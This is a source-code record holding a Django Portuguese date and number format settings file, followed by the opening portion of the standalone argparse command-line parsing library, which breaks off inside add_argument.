# -*- encoding: utf-8 -*- # This file is distributed under the same license as the Django package. # from __future__ import unicode_literals # The *_FORMAT strings use the Django date format syntax, # see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date DATE_FORMAT = r'j \d\e F \d\e Y' TIME_FORMAT = 'H:i' DATETIME_FORMAT = r'j \d\e F \d\e Y à\s H:i' YEAR_MONTH_FORMAT = r'F \d\e Y' MONTH_DAY_FORMAT = r'j \d\e F' SHORT_DATE_FORMAT = 'd/m/Y' SHORT_DATETIME_FORMAT = 'd/m/Y H:i' FIRST_DAY_OF_WEEK = 0 # Sunday # The *_INPUT_FORMATS strings use the Python strftime format syntax, # see http://docs.python.org/library/datetime.html#strftime-strptime-behavior # Kept ISO formats as they are in first position DATE_INPUT_FORMATS = [ '%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', # '2006-10-25', '25/10/2006', '25/10/06' # '%d de %b de %Y', '%d de %b, %Y', # '25 de Out de 2006', '25 Out, 2006' # '%d de %B de %Y', '%d de %B, %Y', # '25 de Outubro de 2006', '25 de Outubro, 2006' ] DATETIME_INPUT_FORMATS = [ '%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59' '%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200' '%Y-%m-%d %H:%M', # '2006-10-25 14:30' '%Y-%m-%d', # '2006-10-25' '%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59' '%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200' '%d/%m/%Y %H:%M', # '25/10/2006 14:30' '%d/%m/%Y', # '25/10/2006' '%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59' '%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200' '%d/%m/%y %H:%M', # '25/10/06 14:30' '%d/%m/%y', # '25/10/06' ] DECIMAL_SEPARATOR = ',' THOUSAND_SEPARATOR = '.' NUMBER_GROUPING = 3
bsd-3-clause
javier-ruiz-b/docker-rasppi-images
raspberry-google-home/env/lib/python3.7/site-packages/argparse.py
81
89214
# Author: Steven J. Bethard <steven.bethard@gmail.com>. # Maintainer: Thomas Waldmann <tw@waldmann-edv.de> """Command-line parsing library This module is an optparse-inspired command-line parsing library that: - handles both optional and positional arguments - produces highly informative usage messages - supports parsers that dispatch to sub-parsers The following is a simple usage example that sums integers from the command-line and writes the result to a file:: parser = argparse.ArgumentParser( description='sum the integers at the command line') parser.add_argument( 'integers', metavar='int', nargs='+', type=int, help='an integer to be summed') parser.add_argument( '--log', default=sys.stdout, type=argparse.FileType('w'), help='the file where the sum should be written') args = parser.parse_args() args.log.write('%s' % sum(args.integers)) args.log.close() The module contains the following public classes: - ArgumentParser -- The main entry point for command-line parsing. As the example above shows, the add_argument() method is used to populate the parser with actions for optional and positional arguments. Then the parse_args() method is invoked to convert the args at the command-line into an object with attributes. - ArgumentError -- The exception raised by ArgumentParser objects when there are errors with the parser's actions. Errors raised while parsing the command-line are caught by ArgumentParser and emitted as command-line messages. - FileType -- A factory for defining types of files to be created. As the example above shows, instances of FileType are typically passed as the type= argument of add_argument() calls. - Action -- The base class for parser actions. Typically actions are selected by passing strings like 'store_true' or 'append_const' to the action= argument of add_argument(). However, for greater customization of ArgumentParser actions, subclasses of Action may be defined and passed as the action= argument. 
- HelpFormatter, RawDescriptionHelpFormatter, RawTextHelpFormatter, ArgumentDefaultsHelpFormatter -- Formatter classes which may be passed as the formatter_class= argument to the ArgumentParser constructor. HelpFormatter is the default, RawDescriptionHelpFormatter and RawTextHelpFormatter tell the parser not to change the formatting for help text, and ArgumentDefaultsHelpFormatter adds information about argument defaults to the help. All other classes in this module are considered implementation details. (Also note that HelpFormatter and RawDescriptionHelpFormatter are only considered public as object names -- the API of the formatter objects is still considered an implementation detail.) """ __version__ = '1.4.0' # we use our own version number independant of the # one in stdlib and we release this on pypi. __external_lib__ = True # to make sure the tests really test THIS lib, # not the builtin one in Python stdlib __all__ = [ 'ArgumentParser', 'ArgumentError', 'ArgumentTypeError', 'FileType', 'HelpFormatter', 'ArgumentDefaultsHelpFormatter', 'RawDescriptionHelpFormatter', 'RawTextHelpFormatter', 'Namespace', 'Action', 'ONE_OR_MORE', 'OPTIONAL', 'PARSER', 'REMAINDER', 'SUPPRESS', 'ZERO_OR_MORE', ] import copy as _copy import os as _os import re as _re import sys as _sys import textwrap as _textwrap from gettext import gettext as _ try: set except NameError: # for python < 2.4 compatibility (sets module is there since 2.3): from sets import Set as set try: basestring except NameError: basestring = str try: sorted except NameError: # for python < 2.4 compatibility: def sorted(iterable, reverse=False): result = list(iterable) result.sort() if reverse: result.reverse() return result def _callable(obj): return hasattr(obj, '__call__') or hasattr(obj, '__bases__') SUPPRESS = '==SUPPRESS==' OPTIONAL = '?' ZERO_OR_MORE = '*' ONE_OR_MORE = '+' PARSER = 'A...' REMAINDER = '...' 
_UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args' # ============================= # Utility functions and classes # ============================= class _AttributeHolder(object): """Abstract base class that provides __repr__. The __repr__ method returns a string in the format:: ClassName(attr=name, attr=name, ...) The attributes are determined either by a class-level attribute, '_kwarg_names', or by inspecting the instance __dict__. """ def __repr__(self): type_name = type(self).__name__ arg_strings = [] for arg in self._get_args(): arg_strings.append(repr(arg)) for name, value in self._get_kwargs(): arg_strings.append('%s=%r' % (name, value)) return '%s(%s)' % (type_name, ', '.join(arg_strings)) def _get_kwargs(self): return sorted(self.__dict__.items()) def _get_args(self): return [] def _ensure_value(namespace, name, value): if getattr(namespace, name, None) is None: setattr(namespace, name, value) return getattr(namespace, name) # =============== # Formatting Help # =============== class HelpFormatter(object): """Formatter for generating usage messages and argument help strings. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. 
""" def __init__(self, prog, indent_increment=2, max_help_position=24, width=None): # default setting for width if width is None: try: width = int(_os.environ['COLUMNS']) except (KeyError, ValueError): width = 80 width -= 2 self._prog = prog self._indent_increment = indent_increment self._max_help_position = max_help_position self._width = width self._current_indent = 0 self._level = 0 self._action_max_length = 0 self._root_section = self._Section(self, None) self._current_section = self._root_section self._whitespace_matcher = _re.compile(r'\s+') self._long_break_matcher = _re.compile(r'\n\n\n+') # =============================== # Section and indentation methods # =============================== def _indent(self): self._current_indent += self._indent_increment self._level += 1 def _dedent(self): self._current_indent -= self._indent_increment assert self._current_indent >= 0, 'Indent decreased below 0.' self._level -= 1 class _Section(object): def __init__(self, formatter, parent, heading=None): self.formatter = formatter self.parent = parent self.heading = heading self.items = [] def format_help(self): # format the indented section if self.parent is not None: self.formatter._indent() join = self.formatter._join_parts for func, args in self.items: func(*args) item_help = join([func(*args) for func, args in self.items]) if self.parent is not None: self.formatter._dedent() # return nothing if the section was empty if not item_help: return '' # add the heading if the section was non-empty if self.heading is not SUPPRESS and self.heading is not None: current_indent = self.formatter._current_indent heading = '%*s%s:\n' % (current_indent, '', self.heading) else: heading = '' # join the section-initial newline, the heading and the help return join(['\n', heading, item_help, '\n']) def _add_item(self, func, args): self._current_section.items.append((func, args)) # ======================== # Message building methods # ======================== def start_section(self, 
heading): self._indent() section = self._Section(self, self._current_section, heading) self._add_item(section.format_help, []) self._current_section = section def end_section(self): self._current_section = self._current_section.parent self._dedent() def add_text(self, text): if text is not SUPPRESS and text is not None: self._add_item(self._format_text, [text]) def add_usage(self, usage, actions, groups, prefix=None): if usage is not SUPPRESS: args = usage, actions, groups, prefix self._add_item(self._format_usage, args) def add_argument(self, action): if action.help is not SUPPRESS: # find all invocations get_invocation = self._format_action_invocation invocations = [get_invocation(action)] for subaction in self._iter_indented_subactions(action): invocations.append(get_invocation(subaction)) # update the maximum item length invocation_length = max([len(s) for s in invocations]) action_length = invocation_length + self._current_indent self._action_max_length = max(self._action_max_length, action_length) # add the item to the list self._add_item(self._format_action, [action]) def add_arguments(self, actions): for action in actions: self.add_argument(action) # ======================= # Help-formatting methods # ======================= def format_help(self): help = self._root_section.format_help() if help: help = self._long_break_matcher.sub('\n\n', help) help = help.strip('\n') + '\n' return help def _join_parts(self, part_strings): return ''.join([part for part in part_strings if part and part is not SUPPRESS]) def _format_usage(self, usage, actions, groups, prefix): if prefix is None: prefix = _('usage: ') # if usage is specified, use that if usage is not None: usage = usage % dict(prog=self._prog) # if no optionals or positionals are available, usage is just prog elif usage is None and not actions: usage = '%(prog)s' % dict(prog=self._prog) # if optionals and positionals are available, calculate usage elif usage is None: prog = '%(prog)s' % dict(prog=self._prog) # 
split optionals from positionals optionals = [] positionals = [] for action in actions: if action.option_strings: optionals.append(action) else: positionals.append(action) # build full usage string format = self._format_actions_usage action_usage = format(optionals + positionals, groups) usage = ' '.join([s for s in [prog, action_usage] if s]) # wrap the usage parts if it's too long text_width = self._width - self._current_indent if len(prefix) + len(usage) > text_width: # break usage into wrappable parts part_regexp = r'\(.*?\)+|\[.*?\]+|\S+' opt_usage = format(optionals, groups) pos_usage = format(positionals, groups) opt_parts = _re.findall(part_regexp, opt_usage) pos_parts = _re.findall(part_regexp, pos_usage) assert ' '.join(opt_parts) == opt_usage assert ' '.join(pos_parts) == pos_usage # helper for wrapping lines def get_lines(parts, indent, prefix=None): lines = [] line = [] if prefix is not None: line_len = len(prefix) - 1 else: line_len = len(indent) - 1 for part in parts: if line_len + 1 + len(part) > text_width: lines.append(indent + ' '.join(line)) line = [] line_len = len(indent) - 1 line.append(part) line_len += len(part) + 1 if line: lines.append(indent + ' '.join(line)) if prefix is not None: lines[0] = lines[0][len(indent):] return lines # if prog is short, follow it with optionals or positionals if len(prefix) + len(prog) <= 0.75 * text_width: indent = ' ' * (len(prefix) + len(prog) + 1) if opt_parts: lines = get_lines([prog] + opt_parts, indent, prefix) lines.extend(get_lines(pos_parts, indent)) elif pos_parts: lines = get_lines([prog] + pos_parts, indent, prefix) else: lines = [prog] # if prog is long, put it on its own line else: indent = ' ' * len(prefix) parts = opt_parts + pos_parts lines = get_lines(parts, indent) if len(lines) > 1: lines = [] lines.extend(get_lines(opt_parts, indent)) lines.extend(get_lines(pos_parts, indent)) lines = [prog] + lines # join lines into usage usage = '\n'.join(lines) # prefix with 'usage:' return '%s%s\n\n' 
% (prefix, usage) def _format_actions_usage(self, actions, groups): # find group indices and identify actions in groups group_actions = set() inserts = {} for group in groups: try: start = actions.index(group._group_actions[0]) except ValueError: continue else: end = start + len(group._group_actions) if actions[start:end] == group._group_actions: for action in group._group_actions: group_actions.add(action) if not group.required: if start in inserts: inserts[start] += ' [' else: inserts[start] = '[' inserts[end] = ']' else: if start in inserts: inserts[start] += ' (' else: inserts[start] = '(' inserts[end] = ')' for i in range(start + 1, end): inserts[i] = '|' # collect all actions format strings parts = [] for i, action in enumerate(actions): # suppressed arguments are marked with None # remove | separators for suppressed arguments if action.help is SUPPRESS: parts.append(None) if inserts.get(i) == '|': inserts.pop(i) elif inserts.get(i + 1) == '|': inserts.pop(i + 1) # produce all arg strings elif not action.option_strings: part = self._format_args(action, action.dest) # if it's in a group, strip the outer [] if action in group_actions: if part[0] == '[' and part[-1] == ']': part = part[1:-1] # add the action string to the list parts.append(part) # produce the first way to invoke the option in brackets else: option_string = action.option_strings[0] # if the Optional doesn't take a value, format is: # -s or --long if action.nargs == 0: part = '%s' % option_string # if the Optional takes a value, format is: # -s ARGS or --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) part = '%s %s' % (option_string, args_string) # make it look optional if it's not required or in a group if not action.required and action not in group_actions: part = '[%s]' % part # add the action string to the list parts.append(part) # insert things at the necessary indices for i in sorted(inserts, reverse=True): parts[i:i] = [inserts[i]] # join all 
the action items with spaces text = ' '.join([item for item in parts if item is not None]) # clean up separators for mutually exclusive groups open = r'[\[(]' close = r'[\])]' text = _re.sub(r'(%s) ' % open, r'\1', text) text = _re.sub(r' (%s)' % close, r'\1', text) text = _re.sub(r'%s *%s' % (open, close), r'', text) text = _re.sub(r'\(([^|]*)\)', r'\1', text) text = text.strip() # return the text return text def _format_text(self, text): if '%(prog)' in text: text = text % dict(prog=self._prog) text_width = self._width - self._current_indent indent = ' ' * self._current_indent return self._fill_text(text, text_width, indent) + '\n\n' def _format_action(self, action): # determine the required width and the entry label help_position = min(self._action_max_length + 2, self._max_help_position) help_width = self._width - help_position action_width = help_position - self._current_indent - 2 action_header = self._format_action_invocation(action) # ho nelp; start on same line and add a final newline if not action.help: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup # short action name; start on the same line and pad two spaces elif len(action_header) <= action_width: tup = self._current_indent, '', action_width, action_header action_header = '%*s%-*s ' % tup indent_first = 0 # long action name; start on the next line else: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup indent_first = help_position # collect the pieces of the action help parts = [action_header] # if there was help for the action, add lines of help text if action.help: help_text = self._expand_help(action) help_lines = self._split_lines(help_text, help_width) parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) # or add a newline if the description doesn't end with one elif not action_header.endswith('\n'): parts.append('\n') # if there are any sub-actions, 
add their help as well for subaction in self._iter_indented_subactions(action): parts.append(self._format_action(subaction)) # return a single string return self._join_parts(parts) def _format_action_invocation(self, action): if not action.option_strings: metavar, = self._metavar_formatter(action, action.dest)(1) return metavar else: parts = [] # if the Optional doesn't take a value, format is: # -s, --long if action.nargs == 0: parts.extend(action.option_strings) # if the Optional takes a value, format is: # -s ARGS, --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) for option_string in action.option_strings: parts.append('%s %s' % (option_string, args_string)) return ', '.join(parts) def _metavar_formatter(self, action, default_metavar): if action.metavar is not None: result = action.metavar elif action.choices is not None: choice_strs = [str(choice) for choice in action.choices] result = '{%s}' % ','.join(choice_strs) else: result = default_metavar def format(tuple_size): if isinstance(result, tuple): return result else: return (result, ) * tuple_size return format def _format_args(self, action, default_metavar): get_metavar = self._metavar_formatter(action, default_metavar) if action.nargs is None: result = '%s' % get_metavar(1) elif action.nargs == OPTIONAL: result = '[%s]' % get_metavar(1) elif action.nargs == ZERO_OR_MORE: result = '[%s [%s ...]]' % get_metavar(2) elif action.nargs == ONE_OR_MORE: result = '%s [%s ...]' % get_metavar(2) elif action.nargs == REMAINDER: result = '...' elif action.nargs == PARSER: result = '%s ...' 
% get_metavar(1) else: formats = ['%s' for _ in range(action.nargs)] result = ' '.join(formats) % get_metavar(action.nargs) return result def _expand_help(self, action): params = dict(vars(action), prog=self._prog) for name in list(params): if params[name] is SUPPRESS: del params[name] for name in list(params): if hasattr(params[name], '__name__'): params[name] = params[name].__name__ if params.get('choices') is not None: choices_str = ', '.join([str(c) for c in params['choices']]) params['choices'] = choices_str return self._get_help_string(action) % params def _iter_indented_subactions(self, action): try: get_subactions = action._get_subactions except AttributeError: pass else: self._indent() for subaction in get_subactions(): yield subaction self._dedent() def _split_lines(self, text, width): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.wrap(text, width) def _fill_text(self, text, width, indent): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.fill(text, width, initial_indent=indent, subsequent_indent=indent) def _get_help_string(self, action): return action.help class RawDescriptionHelpFormatter(HelpFormatter): """Help message formatter which retains any formatting in descriptions. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _fill_text(self, text, width, indent): return ''.join([indent + line for line in text.splitlines(True)]) class RawTextHelpFormatter(RawDescriptionHelpFormatter): """Help message formatter which retains formatting of all help text. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _split_lines(self, text, width): return text.splitlines() class ArgumentDefaultsHelpFormatter(HelpFormatter): """Help message formatter which adds default values to argument help. 
    Only the name of this class is considered a public API. All the methods
    provided by the class are considered an implementation detail.
    """

    def _get_help_string(self, action):
        # Append "(default: %(default)s)" to the help text, but only when
        # the help does not already reference the default, the default is
        # not suppressed, and the action can actually be defaulted (it is
        # an optional, or a positional with '?'/'*' nargs).
        help = action.help
        if '%(default)' not in action.help:
            if action.default is not SUPPRESS:
                defaulting_nargs = [OPTIONAL, ZERO_OR_MORE]
                if action.option_strings or action.nargs in defaulting_nargs:
                    help += ' (default: %(default)s)'
        return help


# =====================
# Options and Arguments
# =====================

def _get_action_name(argument):
    # Best-effort human-readable name for an action, used in error messages.
    # Preference order: option strings, then metavar, then dest.
    if argument is None:
        return None
    elif argument.option_strings:
        return '/'.join(argument.option_strings)
    elif argument.metavar not in (None, SUPPRESS):
        return argument.metavar
    elif argument.dest not in (None, SUPPRESS):
        return argument.dest
    else:
        return None


class ArgumentError(Exception):
    """An error from creating or using an argument (optional or positional).

    The string value of this exception is the message, augmented with
    information about the argument that caused it.
    """

    def __init__(self, argument, message):
        self.argument_name = _get_action_name(argument)
        self.message = message

    def __str__(self):
        if self.argument_name is None:
            format = '%(message)s'
        else:
            format = 'argument %(argument_name)s: %(message)s'
        return format % dict(message=self.message,
                             argument_name=self.argument_name)


class ArgumentTypeError(Exception):
    """An error from trying to convert a command line string to a type."""
    pass


# ==============
# Action classes
# ==============

class Action(_AttributeHolder):
    """Information about how to convert command line strings to Python objects.

    Action objects are used by an ArgumentParser to represent the information
    needed to parse a single argument from one or more strings from the
    command line. The keyword arguments to the Action constructor are also
    all attributes of Action instances.

    Keyword Arguments:

        - option_strings -- A list of command-line option strings which
            should be associated with this action.

        - dest -- The name of the attribute to hold the created object(s)

        - nargs -- The number of command-line arguments that should be
            consumed. By default, one argument will be consumed and a single
            value will be produced.  Other values include:
                - N (an integer) consumes N arguments (and produces a list)
                - '?' consumes zero or one arguments
                - '*' consumes zero or more arguments (and produces a list)
                - '+' consumes one or more arguments (and produces a list)
            Note that the difference between the default and nargs=1 is that
            with the default, a single value will be produced, while with
            nargs=1, a list containing a single value will be produced.

        - const -- The value to be produced if the option is specified and the
            option uses an action that takes no values.

        - default -- The value to be produced if the option is not specified.

        - type -- The type which the command-line arguments should be converted
            to, should be one of 'string', 'int', 'float', 'complex' or a
            callable object that accepts a single string argument. If None,
            'string' is assumed.

        - choices -- A container of values that should be allowed. If not None,
            after a command-line argument has been converted to the appropriate
            type, an exception will be raised if it is not a member of this
            collection.

        - required -- True if the action must always be specified at the
            command line. This is only meaningful for optional command-line
            arguments.

        - help -- The help string describing the argument.

        - metavar -- The name to be used for the option's argument with the
            help string. If None, the 'dest' value will be used as the name.
    """

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        self.option_strings = option_strings
        self.dest = dest
        self.nargs = nargs
        self.const = const
        self.default = default
        self.type = type
        self.choices = choices
        self.required = required
        self.help = help
        self.metavar = metavar

    def _get_kwargs(self):
        # Attributes shown in the _AttributeHolder repr of this action.
        names = [
            'option_strings',
            'dest',
            'nargs',
            'const',
            'default',
            'type',
            'choices',
            'help',
            'metavar',
        ]
        return [(name, getattr(self, name)) for name in names]

    def __call__(self, parser, namespace, values, option_string=None):
        # Subclasses must override this with the logic that records the
        # parsed values on the namespace.
        raise NotImplementedError(_('.__call__() not defined'))


class _StoreAction(Action):
    # The default action: store the converted value under `dest`.

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        if nargs == 0:
            raise ValueError('nargs for store actions must be > 0; if you '
                             'have nothing to store, actions such as store '
                             'true or store const may be more appropriate')
        if const is not None and nargs != OPTIONAL:
            raise ValueError('nargs must be %r to supply const' % OPTIONAL)
        super(_StoreAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=nargs,
            const=const,
            default=default,
            type=type,
            choices=choices,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, values)


class _StoreConstAction(Action):
    # Store a fixed constant when the option is seen; consumes no arguments.
    # NOTE(review): `metavar` is accepted but not forwarded to
    # Action.__init__ here — confirm intentional before changing.

    def __init__(self,
                 option_strings,
                 dest,
                 const,
                 default=None,
                 required=False,
                 help=None,
                 metavar=None):
        super(_StoreConstAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            const=const,
            default=default,
            required=required,
            help=help)

    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, self.const)


class _StoreTrueAction(_StoreConstAction):
    # store_const specialized to const=True (default False).

    def __init__(self,
                 option_strings,
                 dest,
                 default=False,
                 required=False,
                 help=None):
        super(_StoreTrueAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            const=True,
            default=default,
            required=required,
            help=help)


class _StoreFalseAction(_StoreConstAction):
    # store_const specialized to const=False (default True).

    def __init__(self,
                 option_strings,
                 dest,
                 default=True,
                 required=False,
                 help=None):
        super(_StoreFalseAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            const=False,
            default=default,
            required=required,
            help=help)


class _AppendAction(Action):
    # Append each occurrence's value to a list stored under `dest`.

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        if nargs == 0:
            raise ValueError('nargs for append actions must be > 0; if arg '
                             'strings are not supplying the value to append, '
                             'the append const action may be more appropriate')
        if const is not None and nargs != OPTIONAL:
            raise ValueError('nargs must be %r to supply const' % OPTIONAL)
        super(_AppendAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=nargs,
            const=const,
            default=default,
            type=type,
            choices=choices,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        # Copy before appending so a shared default list is never mutated
        # in place.
        items = _copy.copy(_ensure_value(namespace, self.dest, []))
        items.append(values)
        setattr(namespace, self.dest, items)


class _AppendConstAction(Action):
    # Append a fixed constant to the list under `dest`; consumes no arguments.

    def __init__(self,
                 option_strings,
                 dest,
                 const,
                 default=None,
                 required=False,
                 help=None,
                 metavar=None):
        super(_AppendConstAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            const=const,
            default=default,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        items = _copy.copy(_ensure_value(namespace, self.dest, []))
        items.append(self.const)
        setattr(namespace, self.dest, items)


class _CountAction(Action):
    # Count the number of times the option occurs (e.g. -vvv).

    def __init__(self,
                 option_strings,
                 dest,
                 default=None,
                 required=False,
                 help=None):
        super(_CountAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            default=default,
            required=required,
            help=help)

    def __call__(self, parser, namespace,
                 values, option_string=None):
        # Increment the counter stored under `dest`, starting from 0.
        new_count = _ensure_value(namespace, self.dest, 0) + 1
        setattr(namespace, self.dest, new_count)


class _HelpAction(Action):
    # Print the parser's help text and exit the program.

    def __init__(self,
                 option_strings,
                 dest=SUPPRESS,
                 default=SUPPRESS,
                 help=None):
        super(_HelpAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            default=default,
            nargs=0,
            help=help)

    def __call__(self, parser, namespace, values, option_string=None):
        parser.print_help()
        parser.exit()


class _VersionAction(Action):
    # Print version text (from the action, or the parser's deprecated
    # `version` attribute) and exit the program.

    def __init__(self,
                 option_strings,
                 version=None,
                 dest=SUPPRESS,
                 default=SUPPRESS,
                 help="show program's version number and exit"):
        super(_VersionAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            default=default,
            nargs=0,
            help=help)
        self.version = version

    def __call__(self, parser, namespace, values, option_string=None):
        version = self.version
        if version is None:
            # Fall back to the deprecated parser-level version attribute.
            version = parser.version
        formatter = parser._get_formatter()
        formatter.add_text(version)
        parser.exit(message=formatter.format_help())


class _SubParsersAction(Action):
    # Dispatch the remainder of the command line to a named sub-parser.

    class _ChoicesPseudoAction(Action):
        # Placeholder action used only so each sub-command (and its
        # aliases) shows up in the help listing.

        def __init__(self, name, aliases, help):
            metavar = dest = name
            if aliases:
                metavar += ' (%s)' % ', '.join(aliases)
            sup = super(_SubParsersAction._ChoicesPseudoAction, self)
            sup.__init__(option_strings=[], dest=dest, help=help,
                         metavar=metavar)

    def __init__(self,
                 option_strings,
                 prog,
                 parser_class,
                 dest=SUPPRESS,
                 help=None,
                 metavar=None):
        self._prog_prefix = prog
        self._parser_class = parser_class
        self._name_parser_map = {}
        self._choices_actions = []
        super(_SubParsersAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=PARSER,
            choices=self._name_parser_map,
            help=help,
            metavar=metavar)

    def add_parser(self, name, **kwargs):
        # set prog from the existing prefix
        if kwargs.get('prog') is None:
            kwargs['prog'] = '%s %s' % (self._prog_prefix, name)

        aliases = kwargs.pop('aliases', ())

        # create a pseudo-action to hold the choice help
        if 'help' in kwargs:
            help = kwargs.pop('help')
            choice_action = self._ChoicesPseudoAction(name, aliases, help)
            self._choices_actions.append(choice_action)

        # create the parser and add it to the map
        parser = self._parser_class(**kwargs)
        self._name_parser_map[name] = parser

        # make parser available under aliases also
        for alias in aliases:
            self._name_parser_map[alias] = parser

        return parser

    def _get_subactions(self):
        return self._choices_actions

    def __call__(self, parser, namespace, values, option_string=None):
        # First value is the sub-command name; the rest go to the sub-parser.
        parser_name = values[0]
        arg_strings = values[1:]

        # set the parser name if requested
        if self.dest is not SUPPRESS:
            setattr(namespace, self.dest, parser_name)

        # select the parser
        try:
            parser = self._name_parser_map[parser_name]
        except KeyError:
            tup = parser_name, ', '.join(self._name_parser_map)
            msg = _('unknown parser %r (choices: %s)' % tup)
            raise ArgumentError(self, msg)

        # parse all the remaining options into the namespace
        # store any unrecognized options on the object, so that the top
        # level parser can decide what to do with them
        namespace, arg_strings = parser.parse_known_args(arg_strings,
                                                         namespace)
        if arg_strings:
            vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
            getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)


# ==============
# Type classes
# ==============

class FileType(object):
    """Factory for creating file object types

    Instances of FileType are typically passed as type= arguments to the
    ArgumentParser add_argument() method.

    Keyword Arguments:
        - mode -- A string indicating how the file is to be opened. Accepts the
            same values as the builtin open() function.
        - bufsize -- The file's desired buffer size. Accepts the same values as
            the builtin open() function.
    """

    def __init__(self, mode='r', bufsize=None):
        self._mode = mode
        self._bufsize = bufsize

    def __call__(self, string):
        # the special argument "-" means sys.std{in,out}
        if string == '-':
            if 'r' in self._mode:
                return _sys.stdin
            elif 'w' in self._mode:
                return _sys.stdout
            else:
                msg = _('argument "-" with mode %r' % self._mode)
                raise ValueError(msg)

        try:
            # all other arguments are used as file names
            if self._bufsize:
                return open(string, self._mode, self._bufsize)
            else:
                return open(string, self._mode)
        except IOError:
            # Re-raise as ArgumentTypeError so the parser reports it as a
            # normal argument conversion failure.
            err = _sys.exc_info()[1]
            message = _("can't open '%s': %s")
            raise ArgumentTypeError(message % (string, err))

    def __repr__(self):
        args = [self._mode, self._bufsize]
        args_str = ', '.join([repr(arg) for arg in args if arg is not None])
        return '%s(%s)' % (type(self).__name__, args_str)

# ===========================
# Optional and Positional Parsing
# ===========================

class Namespace(_AttributeHolder):
    """Simple object for storing attributes.

    Implements equality by attribute names and values, and provides a simple
    string representation.
    """

    def __init__(self, **kwargs):
        for name in kwargs:
            setattr(self, name, kwargs[name])

    # Namespaces are mutable, so they are deliberately unhashable.
    __hash__ = None

    def __eq__(self, other):
        return vars(self) == vars(other)

    def __ne__(self, other):
        return not (self == other)

    def __contains__(self, key):
        return key in self.__dict__


class _ActionsContainer(object):
    # Shared base for ArgumentParser and argument groups: holds the action
    # registries, defaults storage, and the add_argument() machinery.

    def __init__(self,
                 description,
                 prefix_chars,
                 argument_default,
                 conflict_handler):
        super(_ActionsContainer, self).__init__()

        self.description = description
        self.argument_default = argument_default
        self.prefix_chars = prefix_chars
        self.conflict_handler = conflict_handler

        # set up registries
        self._registries = {}

        # register actions
        self.register('action', None, _StoreAction)
        self.register('action', 'store', _StoreAction)
        self.register('action', 'store_const', _StoreConstAction)
        self.register('action', 'store_true', _StoreTrueAction)
        self.register('action', 'store_false', _StoreFalseAction)
        self.register('action', 'append', _AppendAction)
        self.register('action', 'append_const', _AppendConstAction)
        self.register('action', 'count', _CountAction)
        self.register('action', 'help', _HelpAction)
        self.register('action', 'version', _VersionAction)
        self.register('action', 'parsers', _SubParsersAction)

        # raise an exception if the conflict handler is invalid
        self._get_handler()

        # action storage
        self._actions = []
        self._option_string_actions = {}

        # groups
        self._action_groups = []
        self._mutually_exclusive_groups = []

        # defaults storage
        self._defaults = {}

        # determines whether an "option" looks like a negative number
        self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$')

        # whether or not there are any optionals that look like negative
        # numbers -- uses a list so it can be shared and edited
        self._has_negative_number_optionals = []

    # ====================
    # Registration methods
    # ====================
    def register(self, registry_name, value, object):
        registry = self._registries.setdefault(registry_name, {})
        registry[value] = object

    def _registry_get(self, registry_name, value,
                      default=None):
        return self._registries[registry_name].get(value, default)

    # ==================================
    # Namespace default accessor methods
    # ==================================
    def set_defaults(self, **kwargs):
        self._defaults.update(kwargs)

        # if these defaults match any existing arguments, replace
        # the previous default on the object with the new one
        for action in self._actions:
            if action.dest in kwargs:
                action.default = kwargs[action.dest]

    def get_default(self, dest):
        # An explicit per-action default wins over the container default.
        for action in self._actions:
            if action.dest == dest and action.default is not None:
                return action.default
        return self._defaults.get(dest, None)

    # =======================
    # Adding argument actions
    # =======================
    def add_argument(self, *args, **kwargs):
        """
        add_argument(dest, ..., name=value, ...)
        add_argument(option_string, option_string, ..., name=value, ...)
        """

        # if no positional args are supplied or only one is supplied and
        # it doesn't look like an option string, parse a positional
        # argument
        chars = self.prefix_chars
        if not args or len(args) == 1 and args[0][0] not in chars:
            if args and 'dest' in kwargs:
